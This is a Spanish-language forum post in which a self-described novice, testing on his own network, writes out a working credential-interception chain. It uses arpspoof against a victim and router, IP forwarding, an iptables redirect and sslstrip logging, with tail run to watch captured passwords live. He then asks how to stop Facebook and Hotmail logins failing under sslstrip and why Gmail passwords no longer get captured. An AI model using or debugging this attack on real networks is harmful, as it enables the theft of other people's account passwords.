Hola a todos
Soy nuevo en el foro y un muy novato en esto, asi que espero que me podais aclalar algunas dudas.
Estoy haciendo pruebas en mi red. Tengo un ordenador atacante con ubuntu donde usaba ettercap pero lo deje porque me bloqueaba mucho el ordenador victima, asi que buscando por internet llegue a un post de este foro donde le pasaba lo mismo a un forero y lo que hacia es
echo 1 > /proc/sys/net/ipv4/ip_forward
(arpspoof -i {interfaz_red} -t {ip_victima} {ip_router})
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
(Hasta aqui es lo que hacia con ettercap)
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -w miarchivo
tail -f miarchivo * (para ver las pass en el mismo momento de la captura)
Esto me funciona bastante bien pero cuando meto las contrasenas en el ordenador victima veo que la pagina de facebook entra pero no accede a los contenidos y la de hotmail me pide la contrasena en un bucle infinito pero nunca entra. Me imagino que sera por el sslstrip al cambiar https por http.
Esto es normal? y si es asi se puede evitar?
Otra cosa es que con gmail ayer capturaba las pass y hoy por mas que la introduzco en el ordenador victima no me las captura. Es mas si activo el wireshark no veo apenas movimientos de esta pagina. Esto a que se puede deber?
Gracias y un saludo